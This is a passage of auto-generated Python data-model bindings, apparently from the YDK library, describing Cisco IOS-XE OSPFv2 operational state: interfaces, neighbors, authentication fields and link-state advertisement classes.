**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: bdr_ip
The address of the backup designated router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: state
The current state of the interface
**type**\: :py:class:`Ospfv2IntfState <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2IntfState>`
**config**\: False
.. attribute:: ttl_security_val
The TTL security information
**type**\: :py:class:`TtlSecurityVal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal>`
**config**\: False
.. attribute:: auth_val
The authentication information
**type**\: :py:class:`AuthVal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal>`
**config**\: False
.. attribute:: ospfv2_neighbor
All the neighbors on the interface
**type**\: list of :py:class:`Ospfv2Neighbor <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface, self).__init__()
self.yang_name = "ospfv2-interface"
self.yang_parent_name = "ospfv2-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([("ttl-security-val", ("ttl_security_val", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal)), ("auth-val", ("auth_val", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal)), ("ospfv2-neighbor", ("ospfv2_neighbor", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor))])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
('network_type', (YLeaf(YType.enumeration, 'network-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfNetworkType', '')])),
('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])),
('passive', (YLeaf(YType.boolean, 'passive'), ['bool'])),
('demand_circuit', (YLeaf(YType.boolean, 'demand-circuit'), ['bool'])),
('mtu_ignore', (YLeaf(YType.boolean, 'mtu-ignore'), ['bool'])),
('prefix_suppresion', (YLeaf(YType.boolean, 'prefix-suppresion'), ['bool'])),
('cost', (YLeaf(YType.uint16, 'cost'), ['int'])),
('hello_interval', (YLeaf(YType.uint16, 'hello-interval'), ['int'])),
('dead_interval', (YLeaf(YType.uint16, 'dead-interval'), ['int'])),
('retransmit_interval', (YLeaf(YType.uint16, 'retransmit-interval'), ['int'])),
('transmit_delay', (YLeaf(YType.uint16, 'transmit-delay'), ['int'])),
('hello_timer', (YLeaf(YType.uint32, 'hello-timer'), ['int'])),
('wait_timer', (YLeaf(YType.uint32, 'wait-timer'), ['int'])),
('dr', (YLeaf(YType.uint32, 'dr'), ['int'])),
('bdr', (YLeaf(YType.uint32, 'bdr'), ['int'])),
('dr_ip', (YLeaf(YType.str, 'dr-ip'), ['str','str'])),
('bdr_ip', (YLeaf(YType.str, 'bdr-ip'), ['str','str'])),
('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'Ospfv2IntfState', '')])),
])
self.name = None
self.network_type = None
self.enable = None
self.passive = None
self.demand_circuit = None
self.mtu_ignore = None
self.prefix_suppresion = None
self.cost = None
self.hello_interval = None
self.dead_interval = None
self.retransmit_interval = None
self.transmit_delay = None
self.hello_timer = None
self.wait_timer = None
self.dr = None
self.bdr = None
self.dr_ip = None
self.bdr_ip = None
self.state = None
self.ttl_security_val = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal()
self.ttl_security_val.parent = self
self._children_name_map["ttl_security_val"] = "ttl-security-val"
self.auth_val = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal()
self.auth_val.parent = self
self._children_name_map["auth_val"] = "auth-val"
self.ospfv2_neighbor = YList(self)
self._segment_path = lambda: "ospfv2-interface" + "[name='" + str(self.name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface, ['name', 'network_type', 'enable', 'passive', 'demand_circuit', 'mtu_ignore', 'prefix_suppresion', 'cost', 'hello_interval', 'dead_interval', 'retransmit_interval', 'transmit_delay', 'hello_timer', 'wait_timer', 'dr', 'bdr', 'dr_ip', 'bdr_ip', 'state'], name, value)
class TtlSecurityVal(Entity):
"""
The TTL security information
.. attribute:: enable
Indicates whether time to live security is enabled
**type**\: bool
**config**\: False
.. attribute:: hops
Number of hops for time to live security
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal, self).__init__()
self.yang_name = "ttl-security-val"
self.yang_parent_name = "ospfv2-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])),
('hops', (YLeaf(YType.int32, 'hops'), ['int'])),
])
self.enable = None
self.hops = None
self._segment_path = lambda: "ttl-security-val"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal, ['enable', 'hops'], name, value)
class AuthVal(Entity):
"""
The authentication information
.. attribute:: no_auth
No authentication in use
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: auth_key
Trailer key chain information
**type**\: :py:class:`AuthKey <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey>`
**config**\: False
.. attribute:: key_chain
Trailer key information
**type**\: :py:class:`KeyChain <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal, self).__init__()
self.yang_name = "auth-val"
self.yang_parent_name = "ospfv2-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("auth-key", ("auth_key", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey)), ("key-chain", ("key_chain", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain))])
self._leafs = OrderedDict([
('no_auth', (YLeaf(YType.uint32, 'no-auth'), ['int'])),
])
self.no_auth = None
self.auth_key = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey()
self.auth_key.parent = self
self._children_name_map["auth_key"] = "auth-key"
self.key_chain = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain()
self.key_chain.parent = self
self._children_name_map["key_chain"] = "key-chain"
self._segment_path = lambda: "auth-val"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal, ['no_auth'], name, value)
class AuthKey(Entity):
"""
Trailer key chain information
.. attribute:: key_id
The key identifier
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: key_string
The key string
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: crypto_algo
The algorithm in use
**type**\: :py:class:`Ospfv2CryptoAlgorithm <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2CryptoAlgorithm>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey, self).__init__()
self.yang_name = "auth-key"
self.yang_parent_name = "auth-val"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('key_id', (YLeaf(YType.uint8, 'key-id'), ['int'])),
('key_string', (YLeafList(YType.uint8, 'key-string'), ['int'])),
('crypto_algo', (YLeaf(YType.enumeration, 'crypto-algo'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'Ospfv2CryptoAlgorithm', '')])),
])
self.key_id = None
self.key_string = []
self.crypto_algo = None
self._segment_path = lambda: "auth-key"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey, ['key_id', 'key_string', 'crypto_algo'], name, value)
class KeyChain(Entity):
"""
Trailer key information
.. attribute:: key_chain
The key chain
**type**\: list of int
**range:** 0..255
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain, self).__init__()
self.yang_name = "key-chain"
self.yang_parent_name = "auth-val"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('key_chain', (YLeafList(YType.uint8, 'key-chain'), ['int'])),
])
self.key_chain = []
self._segment_path = lambda: "key-chain"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain, ['key_chain'], name, value)
class Ospfv2Neighbor(Entity):
"""
All the neighbors on the interface
.. attribute:: nbr_id (key)
The neighbor identifier
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: dr
The neighbor's Designated Router indentifier
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: bdr
The neighbor's Backup Designated Router identifier
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: dr_ip
The designated routers' IP address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: bdr_ip
The backup designated routers' IP address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: event_count
A count of neighbor events
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: retrans_count
A count of the retransmission events
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: state
The current neighbor state
**type**\: :py:class:`NbrStateType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.NbrStateType>`
**config**\: False
.. attribute:: dead_timer
The dead timer in seconds
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor, self).__init__()
self.yang_name = "ospfv2-neighbor"
self.yang_parent_name = "ospfv2-interface"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['nbr_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('nbr_id', (YLeaf(YType.uint32, 'nbr-id'), ['int'])),
('address', (YLeaf(YType.str, 'address'), ['str','str'])),
('dr', (YLeaf(YType.uint32, 'dr'), ['int'])),
('bdr', (YLeaf(YType.uint32, 'bdr'), ['int'])),
('dr_ip', (YLeaf(YType.str, 'dr-ip'), ['str','str'])),
('bdr_ip', (YLeaf(YType.str, 'bdr-ip'), ['str','str'])),
('event_count', (YLeaf(YType.uint32, 'event-count'), ['int'])),
('retrans_count', (YLeaf(YType.uint32, 'retrans-count'), ['int'])),
('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'NbrStateType', '')])),
('dead_timer', (YLeaf(YType.uint32, 'dead-timer'), ['int'])),
])
self.nbr_id = None
self.address = None
self.dr = None
self.bdr = None
self.dr_ip = None
self.bdr_ip = None
self.event_count = None
self.retrans_count = None
self.state = None
self.dead_timer = None
self._segment_path = lambda: "ospfv2-neighbor" + "[nbr-id='" + str(self.nbr_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor, ['nbr_id', 'address', 'dr', 'bdr', 'dr_ip', 'bdr_ip', 'event_count', 'retrans_count', 'state', 'dead_timer'], name, value)
class Ospfv2LsdbExternal(Entity):
"""
The external LSDB information
.. attribute:: lsa_type (key)
Link State Advertisement type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: lsa_id (key)
Link State Advertisement Identifer
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: advertising_router (key)
Advertising router
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_age
The age of the Link State Advertisement
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: lsa_options
The options of the Link State Advertisement
**type**\: :py:class:`Ospfv2LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaFlagOptions>`
**config**\: False
.. attribute:: lsa_seq_number
The sequence number for the Link State Advertisement
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_checksum
The checksum of the Link State Advertisement
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: lsa_length
The length, in bytes, of the Link State Advertisement
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: ospfv2_router_lsa_links
The router Link State Advertisement links
**type**\: list of :py:class:`Ospfv2RouterLsaLinks <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks>`
**config**\: False
.. attribute:: unsupported_lsa
The unsupported Link State Advertisements
**type**\: :py:class:`UnsupportedLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa>`
**config**\: False
.. attribute:: router_lsa
The router Link State Advertisements
**type**\: :py:class:`RouterLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa>`
**config**\: False
.. attribute:: network_lsa
The network Link State Advertisements
**type**\: :py:class:`NetworkLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa>`
**config**\: False
.. attribute:: network_summary_lsa
The network summary Link State Advertisements
**type**\: :py:class:`NetworkSummaryLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa>`
**config**\: False
.. attribute:: router_summary_lsa
The router summary Link State Advertisements
**type**\: :py:class:`RouterSummaryLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa>`
**config**\: False
.. attribute:: external_lsa
The external Link State Advertisements
**type**\: :py:class:`ExternalLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa>`
**config**\: False
.. attribute:: nssa_lsa
The Not So Stubby Area Link state advertisements
**type**\: :py:class:`NssaLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal, self).__init__()
self.yang_name = "ospfv2-lsdb-external"
self.yang_parent_name = "ospfv2-instance"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['lsa_type','lsa_id','advertising_router']
self._child_classes = OrderedDict([("ospfv2-router-lsa-links", ("ospfv2_router_lsa_links", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks)), ("unsupported-lsa", ("unsupported_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa)), ("router-lsa", ("router_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa)), ("network-lsa", ("network_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa)), ("network-summary-lsa", ("network_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa)), ("router-summary-lsa", ("router_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa)), ("external-lsa", ("external_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa)), ("nssa-lsa", ("nssa_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa))])
self._leafs = OrderedDict([
('lsa_type', (YLeaf(YType.uint8, 'lsa-type'), ['int'])),
('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])),
('advertising_router', (YLeaf(YType.uint32, 'advertising-router'), ['int'])),
('lsa_age', (YLeaf(YType.uint16, 'lsa-age'), ['int'])),
('lsa_options', (YLeaf(YType.bits, 'lsa-options'), ['Bits'])),
('lsa_seq_number', (YLeaf(YType.uint32, 'lsa-seq-number'), ['int'])),
('lsa_checksum', (YLeaf(YType.uint16, 'lsa-checksum'), ['int'])),
('lsa_length', (YLeaf(YType.uint16, 'lsa-length'), ['int'])),
])
self.lsa_type = None
self.lsa_id = None
self.advertising_router = None
self.lsa_age = None
self.lsa_options = Bits()
self.lsa_seq_number = None
self.lsa_checksum = None
self.lsa_length = None
self.unsupported_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa()
self.unsupported_lsa.parent = self
self._children_name_map["unsupported_lsa"] = "unsupported-lsa"
self.router_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa()
self.router_lsa.parent = self
self._children_name_map["router_lsa"] = "router-lsa"
self.network_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa()
self.network_lsa.parent = self
self._children_name_map["network_lsa"] = "network-lsa"
self.network_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa()
self.network_summary_lsa.parent = self
self._children_name_map["network_summary_lsa"] = "network-summary-lsa"
self.router_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa()
self.router_summary_lsa.parent = self
self._children_name_map["router_summary_lsa"] = "router-summary-lsa"
self.external_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa()
self.external_lsa.parent = self
self._children_name_map["external_lsa"] = "external-lsa"
self.nssa_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa()
self.nssa_lsa.parent = self
self._children_name_map["nssa_lsa"] = "nssa-lsa"
self.ospfv2_router_lsa_links = YList(self)
self._segment_path = lambda: "ospfv2-lsdb-external" + "[lsa-type='" + str(self.lsa_type) + "']" + "[lsa-id='" + str(self.lsa_id) + "']" + "[advertising-router='" + str(self.advertising_router) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal, ['lsa_type', 'lsa_id', 'advertising_router', 'lsa_age', 'lsa_options', 'lsa_seq_number', 'lsa_checksum', 'lsa_length'], name, value)
class Ospfv2RouterLsaLinks(Entity):
"""
The router Link State Advertisement links
.. attribute:: link_type (key)
Link Type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: link_id (key)
link Identifier
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: link_data (key)
link data
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: link_topo
Link topology
**type**\: list of :py:class:`LinkTopo <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks, self).__init__()
self.yang_name = "ospfv2-router-lsa-links"
self.yang_parent_name = "ospfv2-lsdb-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['link_type','link_id','link_data']
self._child_classes = OrderedDict([("link-topo", ("link_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo))])
self._leafs = OrderedDict([
('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])),
('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
])
self.link_type = None
self.link_id = None
self.link_data = None
self.link_topo = YList(self)
self._segment_path = lambda: "ospfv2-router-lsa-links" + "[link-type='" + str(self.link_type) + "']" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks, ['link_type', 'link_id', 'link_data'], name, value)
class LinkTopo(Entity):
"""
Link topology
.. attribute:: mt_id
Multi topology identifier
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: topo_metric
Topology metric
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo, self).__init__()
self.yang_name = "link-topo"
self.yang_parent_name = "ospfv2-router-lsa-links"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
('topo_metric', (YLeaf(YType.uint16, 'topo-metric'), ['int'])),
])
self.mt_id = None
self.topo_metric = None
self._segment_path = lambda: "link-topo"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo, ['mt_id', 'topo_metric'], name, value)
class UnsupportedLsa(Entity):
"""
The unsupported Link State Advertisements
.. attribute:: lsa_data
Link State Advertisement data
**type**\: list of int
**range:** 0..255
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa, self).__init__()
self.yang_name = "unsupported-lsa"
self.yang_parent_name = "ospfv2-lsdb-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('lsa_data', (YLeafList(YType.uint8, 'lsa-data'), ['int'])),
])
self.lsa_data = []
self._segment_path = lambda: "unsupported-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa, ['lsa_data'], name, value)
class RouterLsa(Entity):
"""
The router Link State Advertisements
.. attribute:: router_lsa_bits
Router Link State Advertisement bits
**type**\: :py:class:`Ospfv2RouterLsaBits <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2RouterLsaBits>`
**config**\: False
.. attribute:: router_lsa_number_links
Router Link State Advertisement number of links
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa, self).__init__()
self.yang_name = "router-lsa"
self.yang_parent_name = "ospfv2-lsdb-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('router_lsa_bits', (YLeaf(YType.bits, 'router-lsa-bits'), ['Bits'])),
('router_lsa_number_links', (YLeaf(YType.uint16, 'router-lsa-number-links'), ['int'])),
])
self.router_lsa_bits = Bits()
self.router_lsa_number_links = None
self._segment_path = lambda: "router-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa, ['router_lsa_bits', 'router_lsa_number_links'], name, value)
class NetworkLsa(Entity):
"""
The network Link State Advertisements
.. attribute:: network_lsa_mask
Network Link State Advertisement mask
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: network_attached_routers
Network attached routers
**type**\: list of int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa, self).__init__()
self.yang_name = "network-lsa"
self.yang_parent_name = "ospfv2-lsdb-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('network_lsa_mask', (YLeaf(YType.uint32, 'network-lsa-mask'), ['int'])),
('network_attached_routers', (YLeafList(YType.uint32, 'network-attached-routers'), ['int'])),
])
self.network_lsa_mask = None
self.network_attached_routers = []
self._segment_path = lambda: "network-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa, ['network_lsa_mask', 'network_attached_routers'], name, value)
class NetworkSummaryLsa(Entity):
"""
The network summary Link State Advertisements
.. attribute:: summary_lsa_mask
The summary Link State Advertisement mask
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: summary_topo
The summary topology
